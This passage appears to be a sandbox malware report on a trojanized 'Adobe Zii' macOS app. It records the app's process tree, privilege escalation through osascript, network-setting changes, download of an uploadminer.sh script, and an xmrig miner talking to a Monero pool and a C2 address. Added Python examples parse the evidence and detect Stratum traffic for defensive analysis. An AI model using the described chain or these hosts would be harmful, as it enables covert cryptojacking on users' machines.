Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.297 -> queries PID 297Jump to behavior
Reads hardware-related sysctl values
Source: /Users/Shared/./xmrig (PID: 593) Sysctl read request: hw.ncpu (6.3)
Source: /Users/Shared/./xmrig (PID: 617) Sysctl read request: hw.ncpu (6.3)
Reads the system's OS release and/or type
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550) Sysctl requested: kern.ostype (1.1)
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550) Sysctl requested: kern.osrelease (1.2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579) Sysctl requested: kern.ostype (1.1)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579) Sysctl requested: kern.osrelease (1.2)
Reads the system's hostname
Source: /bin/bash (PID: 548) Sysctl requested: kern.hostname (1.10)
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PIDs 553, 557, 558, 559, 566, 568, 570, 582, 587, 588, 595, 602, 604, 606) Sysctl requested: kern.hostname (1.10)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579) Sysctl requested: kern.hostname (1.10)
Note: shells call gethostname() at startup to populate HOSTNAME, which on macOS is a kern.hostname sysctl, so the /bin/sh and /bin/bash rows are expected noise from every shell the sample spawned; the Python rows are the ones worth attributing to the sample's own logic.
Reads the system or server version plist file
Source: /Users/henry/Desktop/unpack/Adobe Zii.app/Contents/MacOS/Application Stub (PID: 546) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist (2 reads)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist (2 reads)
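The sysctl evidence above is a flat list of per-event rows. The following is an added example, not part of the Joe Sandbox report or of any Joe Security code, that parses rows in this format (the sample lines are constructed to mirror the rows above) into per-process behaviour tags: argv lookups of many other PIDs via kern.procargs2 (what /bin/ps does here), host fingerprinting via kern.hostname, kern.ostype and kern.osrelease, and hw.ncpu reads, which a miner typically performs to decide how many worker threads to run. The tag names, the enumeration threshold and the regular expression are this example's own assumptions.

```python
import re
from collections import defaultdict

# Constructed sample rows modelled on the "Sysctl requested" evidence of a
# Joe Sandbox macOS report (written for this example, not copied from a run).
SAMPLE_LINES = """\
Source: /bin/ps (PID: 554) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.466 -> queries PID 466
Source: /bin/ps (PID: 554) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.449 -> queries PID 449
Source: /bin/ps (PID: 554) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.428 -> queries PID 428
Source: /Users/Shared/./xmrig (PID: 593) Sysctl read request: hw.ncpu (6.3)
Source: /bin/sh (PID: 553) Sysctl requested: kern.hostname (1.10)
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550) Sysctl requested: kern.ostype (1.1)
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550) Sysctl requested: kern.osrelease (1.2)
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550) Sysctl requested: kern.hostname (1.10)
"""

# Accepts both "Sysctl requested:" and "Sysctl read request:" rows, with or
# without the "-> queries PID N" suffix used for kern.procargs2 lookups.
LINE_RE = re.compile(
    r"^Source: (?P<path>.+?) \(PID: (?P<pid>\d+)\)\s*"
    r"Sysctl (?:read )?request(?:ed)?: (?P<oid>[\w.]+) \((?P<mib>[\d.]+)\)"
    r"(?: only found for [\d.]+ -> queries PID (?P<target>\d+))?\s*$"
)

# Assumed analyst mapping from sysctl OID to behaviour tag (not from the report).
TAGS = {
    "kern.procargs2": "process-discovery",
    "kern.hostname": "host-fingerprint",
    "kern.ostype": "host-fingerprint",
    "kern.osrelease": "host-fingerprint",
    "hw.ncpu": "cpu-sizing",
}


def parse_sysctl_lines(text):
    """Group evidence rows by (path, pid): which OIDs were read and which PIDs were targeted."""
    procs = defaultdict(lambda: {"oids": set(), "targets": set()})
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a sysctl row; other report rows are ignored
        key = (m.group("path"), int(m.group("pid")))
        procs[key]["oids"].add(m.group("oid"))
        if m.group("target"):
            procs[key]["targets"].add(int(m.group("target")))
    return dict(procs)


def classify(procs, enum_threshold=3):
    """Return {(path, pid): sorted behaviour tags} derived from the sysctl reads."""
    findings = {}
    for (path, pid), info in procs.items():
        tags = {TAGS[o] for o in info["oids"] if o in TAGS}
        # A process looking up its own argv is normal; looking up the argv of
        # many *other* PIDs is process enumeration (ps-style listing).
        if "kern.procargs2" in info["oids"]:
            others = info["targets"] - {pid}
            if len(others) >= enum_threshold:
                tags.add("enumerates-other-processes")
        findings[(path, pid)] = sorted(tags)
    return findings


if __name__ == "__main__":
    for key, tags in classify(parse_sysctl_lines(SAMPLE_LINES)).items():
        print(key, tags)
```

The threshold distinguishes a single targeted lookup from a sweep; on a report like this one, where ps queried 83 PIDs, it fires immediately, while a process that reads only its own argv gets just the generic process-discovery tag.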

Remote Access Functionality:

Writes files containing IP addresses of contacted hosts (e.g. command and control server)
Source: global traffic and dropped files; IP 46.226.108.171 found in file: /private/tmp/uploadminer.sh


Runtime Messages

Command: open
Exit Code: 0
Exit Code Info: (none)
Killed: False
Standard Output: (empty)
Standard Error: (empty)

Behavior Graph

Behavior Graph ID: 65439, Sample: TnrhsyteX1, Start date: 10/12/2018, Architecture: MAC, Score: 80
(Legend of the original graphic: Process, Signature, Created File, DNS/IP Info, Is Dropped, Number of created Files, Shell, Is malicious. The graph is rendered below as text.)

Network endpoints contacted by the sample:
  46.226.108.171 port 4444 (GANDI-AS, France; local ports 49234, 49236)
  pool.monero.hashvault.pro = 37.187.163.200 port 3333 (OVH, France; local ports 49249, 49257): Detected Stratum mining protocol; Detected TCP or UDP traffic on non-standard ports
  2 other IPs or domains

Sample-level signatures: Antivirus detection for dropped file; Uses known network protocols on non-standard ports; Writes files containing IP addresses of contacted hosts (e.g. command and control server)

Process tree as drawn in the graph (child processes after ">", files dropped in parentheses):
  xpcproxy > Application Stub (the sample) > bash
    bash > unzip (drops /Users/henry/sampl...nts/MacOS/Adobe Zii, Mach-O)
    bash > python (Python), bash > 3 other processes
      python > sh > sh > osascript > security_authtrampoline > sh > networksetup, networksetup, curl; each networksetup > cp
      python > sh > sh > rm, rm, 8 other processes
      python > sh > sh > curl, chmod
      python > sh > ps, grep, grep
      python > sh > id
  xpcproxy > python (Python)
    python > sh > sh > osascript > security_authtrampoline > sh > networksetup, networksetup, curl; networksetup > cp (drops /Library/Preferenc...eferences.plist.old, XML)
    python > sh > sh > rm, rm, 8 other processes (one of which drops /Users/Shared/xmrig, Mach-O)
    python > sh > sh > curl (drops /private/tmp/uploadminer.sh, ASCII), chmod
    python > sh > ps, grep, grep
    python > sh > id
  xpcproxy > xmrig

Signatures attached to individual nodes:
  curl nodes: Writes shell scripts with functionality to modify network settings
  ps node: Reads process information of other processes
  rm nodes: Executes the "rm" command used to delete files or directories
  shell, ps, osascript, networksetup and cp nodes: Many shell processes execute programs via execve syscall (may be indicative of malicious behavior)

Note: security_authtrampoline is the helper osascript runs for "do shell script ... with administrator privileges", so the osascript > security_authtrampoline > sh > networksetup chain is the sample changing network settings as root after an authorization prompt.
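The graph above carries two network-side signatures, "Detected Stratum mining protocol" on the hashvault.pro connection and "Writes files containing IP addresses of contacted hosts" on /private/tmp/uploadminer.sh (also listed under Remote Access Functionality). The following is an added example, not Joe Sandbox's detection logic, that reproduces both checks over constructed flow records: it recognises Stratum by the JSON-RPC method names XMRig-style and classic Stratum clients use, flags a known protocol on a non-standard port, and correlates IPv4 addresses found in dropped files with the addresses the sample contacted. The payloads, the HTTP request on port 4444 and the contents of the dropped script are assumptions for illustration; the report shows only the endpoints, the port numbers and the fact that the script embeds 46.226.108.171.

```python
import ipaddress
import json
import re

# Constructed flow records: (dst_ip, dst_port, first client payload line).
# Endpoints mirror the report's behavior graph; payloads are written for this
# example, not captured traffic (the report does not show packet contents).
FLOWS = [
    ("37.187.163.200", 3333,
     '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4ABC...","pass":"x","agent":"XMRig/2.8.3"}}'),
    ("37.187.163.200", 3333,
     '{"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"1","job_id":"a1","nonce":"deadbeef","result":"00"}}'),
    ("46.226.108.171", 4444, "GET / HTTP/1.1"),   # assumed: plain HTTP on a non-standard port
    ("192.0.2.10", 443, "\x16\x03\x01\x02\x00"),  # TLS record header on its usual port (benign control)
]

# Constructed stand-in for the dropped script; only the fact that it embeds
# the contacted address is taken from the report.
DROPPED_FILES = {
    "/private/tmp/uploadminer.sh": "#!/bin/sh\nHOST=46.226.108.171\n",
}

# JSON-RPC method names used by XMRig-style (login/submit/job/keepalived)
# and classic "mining.*" Stratum implementations.
STRATUM_METHODS = {
    "login", "submit", "job", "keepalived",
    "mining.subscribe", "mining.authorize", "mining.notify",
    "mining.submit", "mining.set_difficulty",
}
HTTP_RE = re.compile(r"^(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) \S+ HTTP/1\.[01]\s*$")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
STANDARD_PORTS = {"http": {80, 8080}, "tls": {443}}  # assumed "expected" ports


def stratum_method(payload):
    """Return the Stratum method name if the payload is a Stratum JSON-RPC message, else None."""
    try:
        msg = json.loads(payload)
    except ValueError:  # includes json.JSONDecodeError
        return None
    method = msg.get("method") if isinstance(msg, dict) else None
    return method if method in STRATUM_METHODS else None


def protocol_of(payload):
    """Cheap first-bytes protocol guess: 'http', 'tls' or None."""
    if HTTP_RE.match(payload):
        return "http"
    if payload.startswith("\x16\x03"):  # TLS handshake record, version 3.x
        return "tls"
    return None


def ipv4s_in(text):
    """Dotted quads in text that are syntactically valid IPv4 addresses."""
    found = set()
    for cand in IPV4_RE.findall(text):
        try:
            found.add(str(ipaddress.IPv4Address(cand)))
        except ValueError:
            pass  # e.g. 999.1.1.1 matches the regex but is not an address
    return found


def analyse(flows, dropped_files):
    """Return (signature, where, detail) tuples for the three checks."""
    findings = []
    contacted = {ip for ip, _, _ in flows}
    for ip, port, payload in flows:
        where = f"{ip}:{port}"
        method = stratum_method(payload)
        if method:
            findings.append(("stratum-mining", where, method))
        proto = protocol_of(payload)
        if proto and port not in STANDARD_PORTS[proto]:
            findings.append(("known-protocol-nonstandard-port", where, proto))
    for name, content in dropped_files.items():
        for ip in sorted(ipv4s_in(content) & contacted):
            findings.append(("dropped-file-references-contacted-ip", name, ip))
    return findings


if __name__ == "__main__":
    for finding in analyse(FLOWS, DROPPED_FILES):
        print(*finding)
```

The dropped-file check is deliberately restricted to addresses that also appear in the traffic: a script full of unrelated IP literals is not evidence of C2 on its own, but an address that is both written to disk by the sample and contacted during the run is, which is the pairing the report's signature name describes.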

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

Source: /Users/Shared/xmrig, Detection: 100%, Scanner: Avira, Label: PUA/OSX.CoinMiner.kaotz

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.